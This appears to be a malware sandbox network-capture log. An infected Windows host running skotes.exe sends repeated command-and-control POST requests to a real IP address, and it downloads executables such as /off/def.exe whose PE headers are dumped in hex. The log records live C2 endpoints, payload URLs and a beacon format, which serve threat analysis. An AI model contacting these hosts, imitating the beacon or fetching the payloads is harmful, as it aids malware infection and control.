                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703793049 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703968048 CET1236INData Raw: 24 ce 6a 00 99 e8 3d e0 68 ef 5f 00 41 b8 5f 00 9b ce 5b 00 99 e8 3d de 40 ea 5f 00 9f c8 49 00 99 bb 2f db 98 89 5f 00 99 eb 5f 00 28 ce 58 00 99 ec f5 eb 98 f6 69 da 99 b8 63 b3 5d ef 67 6a 27 ed f0 e7 98 f6 69 72 35 f6 5f 70 40 bd 5f 00 9b a2
                                                                                                                                                                                                                                                                          Data Ascii: $j=h_A_[=@_I/__(Xic]gj'ir5_p@_F_eQA_b^=_gYG]yBi_>_/__(XicRgj'ir_p@_G_eQA_b^=_[=-~c
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.704001904 CET1236INData Raw: a0 e8 5f c4 9e 08 6a de 98 e5 67 f6 9f e8 5f 56 9a e0 6a de 98 89 5d f6 9f e8 5f 1a 9a e0 6a de 98 81 6a f2 99 ec 5f 5e 9a 1a 6a de 98 b8 64 da 98 e8 5f 0d a0 e0 6a de 98 95 68 f6 9f e8 5f f4 9e e0 6a de 98 21 6a f6 9f e8 5f 98 94 9d 67 de 98 8a
                                                                                                                                                                                                                                                                          Data Ascii: _jg_Vj]_jj_^jd_jh_j!j_gg__\g__^_____i_bh___$g_b'k_____b^______bWa____
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.704036951 CET1236INData Raw: 98 5d 5f 37 9b c6 5f 81 98 4f 6a de 98 3d 5f 37 9b bc 5f 19 98 4f 6a de 98 6d 5f 37 9b e8 5f 39 98 4f 6a 01 99 fd 62 b1 9f cd 5f 29 98 a3 64 b4 98 15 63 ce 9f a4 5f 31 98 ca 69 c1 98 25 63 6c 9f af 5f f9 97 a3 64 93 98 25 63 d4 93 85 5f f1 97 05
                                                                                                                                                                                                                                                                          Data Ascii: ]_7_Oj=_7_Ojm_7_9Ojb_)dc_1i%cl_d%c_^c_Idtcd_Igb_aOj_m__V_;__h_Q__b_O__V_"c_1_T__7_@__4_;__7_@_~_N_3c_@_
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.824712992 CET1236INData Raw: e7 87 1b 99 5e 7d 00 c2 e5 87 0b 9f 55 87 25 9e 5b af 5f ab 5f 84 0d 99 55 a9 00 91 ef a9 11 a9 f9 ab 10 96 5e ad 28 00 e2 ab 00 95 53 80 22 97 5f 84 00 94 e9 ab 24 00 e2 a9 11 ae 5b ab 1e 9f 5f 84 11 8f e2 97 1c 92 5b 7a 2a 9b 53 82 5f ab 5f 84
                                                                                                                                                                                                                                                                          Data Ascii: ^}U%[__U^(S"_$[_[z*S__U#[{[{{'x*___U_%\[x{*_z[S{__U\


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          37192.168.2.550182185.215.113.1680
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.363157988 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.766988993 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2778624
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:14:17 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fa49-2a6600"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 2d 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ *-|*`Ui`D @ @ @.rsrcD``@.idata f@kgxazxnt))h@fddzeiuw *>*@.taggant@*"D*@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767044067 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767077923 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767199993 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767256021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767290115 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767345905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767517090 CET1236INData Raw: 24 ce 6a 00 99 e8 3d e0 68 ef 5f 00 41 b8 5f 00 9b ce 5b 00 99 e8 3d de 40 ea 5f 00 9f c8 49 00 99 bb 2f db 98 89 5f 00 99 eb 5f 00 28 ce 58 00 99 ec f5 eb 98 f6 69 da 99 b8 63 b3 5d ef 67 6a 27 ed f0 e7 98 f6 69 72 35 f6 5f 70 40 bd 5f 00 9b a2
                                                                                                                                                                                                                                                                          Data Ascii: $j=h_A_[=@_I/__(Xic]gj'ir5_p@_F_eQA_b^=_gYG]yBi_>_/__(XicRgj'ir_p@_G_eQA_b^=_[=-~c
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767553091 CET1236INData Raw: a0 e8 5f c4 9e 08 6a de 98 e5 67 f6 9f e8 5f 56 9a e0 6a de 98 89 5d f6 9f e8 5f 1a 9a e0 6a de 98 81 6a f2 99 ec 5f 5e 9a 1a 6a de 98 b8 64 da 98 e8 5f 0d a0 e0 6a de 98 95 68 f6 9f e8 5f f4 9e e0 6a de 98 21 6a f6 9f e8 5f 98 94 9d 67 de 98 8a
                                                                                                                                                                                                                                                                          Data Ascii: _jg_Vj]_jj_^jd_jh_j!j_gg__\g__^_____i_bh___$g_b'k_____b^______bWa____
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.767591000 CET1236INData Raw: 98 5d 5f 37 9b c6 5f 81 98 4f 6a de 98 3d 5f 37 9b bc 5f 19 98 4f 6a de 98 6d 5f 37 9b e8 5f 39 98 4f 6a 01 99 fd 62 b1 9f cd 5f 29 98 a3 64 b4 98 15 63 ce 9f a4 5f 31 98 ca 69 c1 98 25 63 6c 9f af 5f f9 97 a3 64 93 98 25 63 d4 93 85 5f f1 97 05
                                                                                                                                                                                                                                                                          Data Ascii: ]_7_Oj=_7_Ojm_7_9Ojb_)dc_1i%cl_d%c_^c_Idtcd_Igb_aOj_m__V_;__h_Q__b_O__V_"c_1_T__7_@__4_;__7_@_~_N_3c_@_
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:11.886974096 CET1236INData Raw: e7 87 1b 99 5e 7d 00 c2 e5 87 0b 9f 55 87 25 9e 5b af 5f ab 5f 84 0d 99 55 a9 00 91 ef a9 11 a9 f9 ab 10 96 5e ad 28 00 e2 ab 00 95 53 80 22 97 5f 84 00 94 e9 ab 24 00 e2 a9 11 ae 5b ab 1e 9f 5f 84 11 8f e2 97 1c 92 5b 7a 2a 9b 53 82 5f ab 5f 84
                                                                                                                                                                                                                                                                          Data Ascii: ^}U%[__U^(S"_$[_[z*S__U#[{[{{'x*___U_%\[x{*_z[S{__U\
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:16.569670916 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:17.011547089 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:16 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2918912
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:16:13 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fabd-2c8a00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 c0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4f 00 00 04 00 00 b5 c9 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(O@O,@M$a$$ $h@.rsrc$x@.idata $z@ndsdenmy*$*|@hxkdstdhOb,@.taggant0O"h,@


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          38192.168.2.550213185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:18.004451990 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018980001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:19.384205103 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          39192.168.2.550218185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:21.159379959 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:22.484910965 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:22 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          40192.168.2.550222185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:24.196548939 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:25.551534891 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:25 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          41192.168.2.550224185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:27.304347992 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:27.694531918 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:28.640265942 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:28 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          42192.168.2.550226185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:30.307962894 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:31.646703005 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          43192.168.2.550229185.215.113.1680
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:31.930788994 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273550034 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:32 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2778624
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:14:17 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fa49-2a6600"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 2d 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ *-|*`Ui`D @ @ @.rsrcD``@.idata f@kgxazxnt))h@fddzeiuw *>*@.taggant@*"D*@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273613930 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273629904 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273824930 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273840904 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273858070 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
